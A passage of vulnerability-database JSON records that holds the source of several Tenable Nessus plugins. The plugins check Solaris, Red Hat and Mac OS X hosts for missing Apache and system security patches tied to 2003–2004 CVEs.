set_kb_item(name:\"CVE-2003-0693\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0695\", value:TRUE);\n}\n\n\nif ( egrep(pattern:\"Red Hat.*(Enterprise|Advanced).*release 2\\.1\", string:release)) \n{\n set_kb_item(name:\"CVE-2000-0666\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0192\", value:TRUE);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:12:12", "description": "SunOS 5.9: Apache Security Patch.\nDate this patch was last updated by Sun : Mar/05/10", "cvss3": {}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 113146-13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2004-0492", "CVE-2007-1349"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_113146.NASL", "href": "https://www.tenable.com/plugins/nessus/13530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13530);\n script_version(\"1.41\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0542\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\", \"CVE-2004-0492\", \"CVE-2007-1349\");\n\n script_name(english:\"Solaris 9 (sparc) : 113146-13\");\n script_summary(english:\"Check for patch 113146-13\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 113146-13\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9: Apache Security Patch.\nDate this patch was last updated by Sun : Mar/05/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1021709.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113146-13\", obsoleted_by:\"\", package:\"SUNWapchu\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113146-13\", obsoleted_by:\"\", package:\"SUNWapchd\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113146-13\", obsoleted_by:\"\", package:\"SUNWapchS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113146-13\", obsoleted_by:\"\", package:\"SUNWapchr\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:38:29", "description": "SunOS 5.8_x86: Apache Patch.\nDate this patch was last updated by Sun : Apr/23/08", "cvss3": {}, "published": "2004-10-17T00:00:00", "type": "nessus", "title": "Solaris 8 (x86) : 116974-07", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2004-0492", "CVE-2007-1349"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_116974.NASL", "href": "https://www.tenable.com/plugins/nessus/15483", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15483);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0542\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\", \"CVE-2004-0492\", \"CVE-2007-1349\");\n\n script_name(english:\"Solaris 8 (x86) : 116974-07\");\n script_summary(english:\"Check for patch 116974-07\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 116974-07\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: Apache Patch.\nDate this patch was last updated by Sun : Apr/23/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/116974-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"116974-07\", obsoleted_by:\"\", package:\"SUNWapchu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"116974-07\", obsoleted_by:\"\", package:\"SUNWapchd\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"116974-07\", obsoleted_by:\"\", package:\"SUNWapchS\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"116974-07\", obsoleted_by:\"\", package:\"SUNWapchr\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:56", "description": "The remote host is missing Security Update 2004-01-26.\n\nThis security update includes the following components :\n\n - Apache 1.3\n - Classic\n - Mail\n - Safari\n - Windows File Sharing\n\nFor MacOS 10.1.5, it only includes the following :\n\n - Mail\n\nThis update contains various fixes which may allow an attacker to execute arbitrary code on the remote host.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-01-26)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0789", "CVE-2004-0085", "CVE-2004-0086", "CVE-2004-0087", "CVE-2004-0088", "CVE-2004-0089", "CVE-2004-0092", "CVE-2004-0174"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20040126.NASL", "href": "https://www.tenable.com/plugins/nessus/12517", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(12517);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2004-0085\", \"CVE-2004-0086\", \"CVE-2004-0087\", \"CVE-2004-0088\", \"CVE-2004-0089\",\n \"CVE-2003-0789\", \"CVE-2003-0542\", \"CVE-2004-0092\", \"CVE-2003-0542\");\n script_bugtraq_id(9069);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-01-26)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X security update.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Security Update 2004-01-26.\n\nThis security update includes the following components :\n\n - Apache 1.3\n - Classic\n - Mail\n - Safari\n - Windows File Sharing\n\nFor MacOS 10.1.5, it only includes the following :\n\n - Mail\n\nThis update contains various fixes which may allow an attacker to execute\narbitrary code on the remote host.\" );\n # http://web.archive.org/web/20040206220131/http://www.apple.com/downloads/macosx/apple/securityupdate_2004-01-26_%2810_2_8_Server%29.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f54f1ccf\" );\n # http://web.archive.org/web/20040206214559/http://www.apple.com/downloads/macosx/apple/securityupdate_2004-01-26_%2810_1_5%29.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1a627a5f\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install security update 2004-01-26. See \nhttp://support.apple.com/kb/HT1646 for more details.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/01/26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_summary(english:\"Check for Security Update 2004-01-26\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# Security Update 2004-05-03 actually includes this update for MacOS X 10.2.8 Client\nif ( egrep(pattern:\"Darwin.* 6\\.8\\.\", string:uname) )\n{\n if ( egrep(pattern:\"^SecUpd2004-05-03\", string:packages) ) exit(0);\n}\n\n# MacOS X 10.1.5, 10.2.8 and 10.3.2 only\nif ( egrep(pattern:\"Darwin.* (5\\.5\\.|6\\.8\\.|7\\.2\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecurityUpd2004-01-26\", string:packages) ) { \n\t\tsecurity_hole(0);\n\t\texit(0);\n\t\t}\n else {\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n }\n}\n\nif ( egrep(pattern:\"Darwin.*\", string:uname) )\n{\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:13:45", "description": "The remote host is missing Security Update 2004-05-03.\nThis security update includes updates for AFP Server, CoreFoundation, and IPSec.\n\nIt also includes Security Update 2004-04-05, which includes updates for CUPS, libxml2, Mail, and OpenSSL.\n\nFor Mac OS X 10.2.8, it also includes updates for Apache 1.3, cd9660.util, Classic, CUPS, Directory Services, DiskArbitration, fetchmail, fs_usage, gm4, groff, Mail, OpenSSL, Personal File Sharing, PPP, rsync, Safari, System Configuration, System Initialization, and zlib.\n\nThis update fixes various issues which may allow an attacker to execute arbitrary code on the remote host.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-05-03)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0020", "CVE-2004-0079", "CVE-2004-0081", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0155", "CVE-2004-0174", "CVE-2004-0392", "CVE-2004-0403", "CVE-2004-0428", "CVE-2004-0430"], "modified": "2018-08-10T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20040503.NASL", "href": "https://www.tenable.com/plugins/nessus/12518", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# better URL in solution, preserving old:\n#http://www.apple.com/downloads/macosx/apple/securityupdate__2004-05-03_(10_3_3_Client).html\n#http://www.apple.com/downloads/macosx/apple/securityupdate_2004-05-03_(10_2_8_Client).html\n#http://www.apple.com/downloads/macosx/apple/securityupdate_2004-05-03_(10_2_8_Server).html\n#http://www.apple.com/downloads/macosx/apple/securityupdate.html\n \nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(12518);\n script_version (\"1.17\");\n script_cve_id(\n \"CVE-2004-0020\",\n \"CVE-2004-0113\",\n \"CVE-2004-0155\",\n \"CVE-2004-0174\",\n \"CVE-2004-0392\",\n \"CVE-2004-0403\", \n \"CVE-2004-0428\",\n \"CVE-2004-0430\"\n );\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-05-03)\");\n script_summary(english:\"Check for Security Update 2004-05-03\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing Security Update 2004-05-03.\nThis security update includes updates for AFP Server, CoreFoundation,\nand IPSec.\n\nIt also includes Security Update 2004-04-05, which includes updates\nfor CUPS, libxml2, Mail, and OpenSSL.\n\nFor Mac OS X 10.2.8, it also includes updates for Apache 1.3,\ncd9660.util, Classic, CUPS, Directory Services, DiskArbitration,\nfetchmail, fs_usage, gm4, groff, Mail, OpenSSL, Personal File Sharing,\nPPP, rsync, Safari, System Configuration, System Initialization, and\nzlib.\n\nThis update fixes various issues which may allow an attacker to\nexecute arbitrary code on the remote host.\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.apple.com/kb/HT1646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.apple.com/archives/security-announce/2004/May/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-05-03.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AppleFileServer LoginExt PathName Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/05/03\");\n script_cvs_date(\"Date: 2018/08/10 18:07:07\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif ( egrep(pattern:\"Mac OS X 10\\.3.* Server\", string:os) ) exit(0);\n\n# MacOS X 10.2.8 and 10.3.3 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.3\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecUpd2004-05-03\", string:packages) ) security_hole(0);\n else {\n\tset_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n\tset_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n\tset_kb_item(name:\"CVE-2004-0079\", value:TRUE);\n\tset_kb_item(name:\"CVE-2004-0081\", value:TRUE);\n\tset_kb_item(name:\"CVE-2004-0112\", value:TRUE);\n\t}\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:20:20", "description": "The remote host is missing Security Update 2004-12-02. This security update contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a remote attacker to execute arbitrary code.", "cvss3": {}, "published": "2004-12-02T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0987", "CVE-2004-0174", "CVE-2004-0488", "CVE-2004-0492", "CVE-2004-0642", "CVE-2004-0643", "CVE-2004-0644", "CVE-2004-0747", "CVE-2004-0748", "CVE-2004-0751", "CVE-2004-0772", "CVE-2004-0786", "CVE-2004-0803", "CVE-2004-0804", "CVE-2004-0885", "CVE-2004-0886", "CVE-2004-0940", "CVE-2004-1081", "CVE-2004-1082", "CVE-2004-1083", "CVE-2004-1084", "CVE-2004-1085", "CVE-2004-1086", "CVE-2004-1087", "CVE-2004-1088", "CVE-2004-1089", "CVE-2004-1121", "CVE-2004-1122", "CVE-2004-1123"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD20041202.NASL", "href": "https://www.tenable.com/plugins/nessus/15898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3004) exit(0); # a large number of xrefs.\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(15898);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2004-1082\", \"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2004-0174\", \"CVE-2004-0488\", \n \"CVE-2004-0492\", \"CVE-2004-0885\", \"CVE-2004-0940\", \"CVE-2004-1083\", \"CVE-2004-1084\", \n \"CVE-2004-0747\", \"CVE-2004-0786\", \"CVE-2004-0751\", \"CVE-2004-0748\", \"CVE-2004-1081\", \n \"CVE-2004-0803\", \"CVE-2004-0804\", \"CVE-2004-0886\", \"CVE-2004-1089\", \"CVE-2004-1085\", \n \"CVE-2004-0642\", \"CVE-2004-0643\", \"CVE-2004-0644\", \"CVE-2004-0772\", \"CVE-2004-1088\", \n \"CVE-2004-1086\", \"CVE-2004-1123\", \"CVE-2004-1121\", \"CVE-2004-1122\", \"CVE-2004-1087\");\n script_bugtraq_id(9921, 9930, 9571, 11471, 11360, 11469, 10508, 11802);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2004-12-02)\");\n script_summary(english:\"Check for Security Update 2004-12-02\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is missing Security Update 2004-12-02. This security\nupdate contains a number of fixes for the following programs :\n\n - Apache\n - Apache2\n - AppKit\n - Cyrus IMAP\n - HIToolbox\n - Kerberos\n - Postfix\n - PSNormalizer\n - QuickTime Streaming Server\n - Safari\n - Terminal\n\nThese programs contain multiple vulnerabilities that could allow a\nremote attacker to execute arbitrary code.\" );\n # http://web.archive.org/web/20080915104713/http://support.apple.com/kb/HT1646?\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?210abeb5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install Security Update 2004-12-02.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/12/02\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\nuname = get_kb_item(\"Host/uname\");\n# MacOS X 10.2.8, 10.3.6 only\nif ( egrep(pattern:\"Darwin.* (6\\.8\\.|7\\.6\\.)\", string:uname) )\n{\n if ( ! egrep(pattern:\"^SecUpd(Srvr)?2004-12-02\", string:packages) ) security_hole(0);\n\telse non_vuln = 1;\n}\nelse if ( egrep(pattern:\"Darwin.* (6\\.9|[0-9][0-9]\\.|7\\.([7-9]|[0-9][0-9]\\.|[8-9]\\.))\", string:uname) ) non_vuln = 1;\n\nif ( non_vuln )\n{\n set_kb_item(name:\"CVE-2004-1082\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0020\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0987\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0174\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0488\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0492\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0885\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0940\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1083\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1084\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0747\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0786\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0751\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0748\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1081\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0803\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0804\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0886\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1089\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1085\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0642\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0643\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0644\", value:TRUE);\n set_kb_item(name:\"CVE-2004-0772\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1088\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1086\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1123\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1121\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1122\", value:TRUE);\n set_kb_item(name:\"CVE-2004-1087\", value:TRUE);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:07:16", "description": "The version of Mac OS X on the remote system is unsupported, and therefore unable to receive the latest security updates from Apple.", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "MacOS X Version Unsupported", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1363", "CVE-2003-0020", "CVE-2003-0542", "CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545", "CVE-2003-0987", "CVE-2004-0079", "CVE-2004-0081", "CVE-2004-0112", "CVE-2004-0174", "CVE-2004-0421", "CVE-2004-0485", "CVE-2004-0488", "CVE-2004-0492", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599", "CVE-2004-0642", "CVE-2004-0643", "CVE-2004-0644", "CVE-2004-0743", "CVE-2004-0744", "CVE-2004-0747", "CVE-2004-0748", "CVE-2004-0751", "CVE-2004-0772", "CVE-2004-0786", "CVE-2004-0803", "CVE-2004-0804", "CVE-2004-0885", "CVE-2004-0886", "CVE-2004-0940", "CVE-2004-1081", "CVE-2004-1082", "CVE-2004-1083", "CVE-2004-1084", "CVE-2004-1085", "CVE-2004-1086", "CVE-2004-1087", "CVE-2004-1088", "CVE-2004-1089", "CVE-2004-1121", "CVE-2004-1122", "CVE-2004-1123"], "modified": "2015-09-24T00:00:00", "cpe": [], "id": "MACOSX_VERSION.NASL", "href": "https://www.tenable.com/plugins/nessus/12521", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# Disabled on 2014/07/06. Deprecated by unsupported_operating_system.nasl.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(12521);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/01\");\n\n script_cve_id(\"CVE-2004-0743\", \"CVE-2004-0744\", \"CVE-2004-0485\");\n script_bugtraq_id(10904, 10406, 10401, 10400);\n\n script_name(english:\"MacOS X Version Unsupported\");\n script_summary(english:\"Check for the version of MacOS X\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is using an unsupported version of Mac OS X.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Mac OS X on the remote system is unsupported, and\ntherefore unable to receive the latest security updates from Apple.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to an up-to-date version of Mac OS X.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"unsupported_by_vendor\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OS\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Use plugin #33850 (unsupported_operating_system.nasl) instead.\");\n\n\n#\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif ( ! os ) os = get_kb_item(\"Host/OS\");\n\nif ( ! os ) exit(0, \"The 'Host/MacOSX/Version' and 'Host/OS' KB items are missing.\");\n\n\nif ( os && \"Mac OS X\" >< os )\n{\n version = os - \"Mac OS X \";\n\n set_kb_item(name:\"Host/MacOSX\", value: os);\n if ( ereg(pattern:\"Mac OS X 10\\.1\\.\", string:os ))\n {\n report = \"\nThe remote host is running Mac OS X 10.1. This version is not supported\nby Apple any more, you should upgrade the remote host to the latest version\nof Mac OS X.\n\";\n if ( ereg(pattern:\"Mac OS X 10\\.1\\.[0-4]\", string:os ))\n {\n report += \"\nIn addition to this, the remote host should at least be upgraded to\nMacOS 10.1.5 using 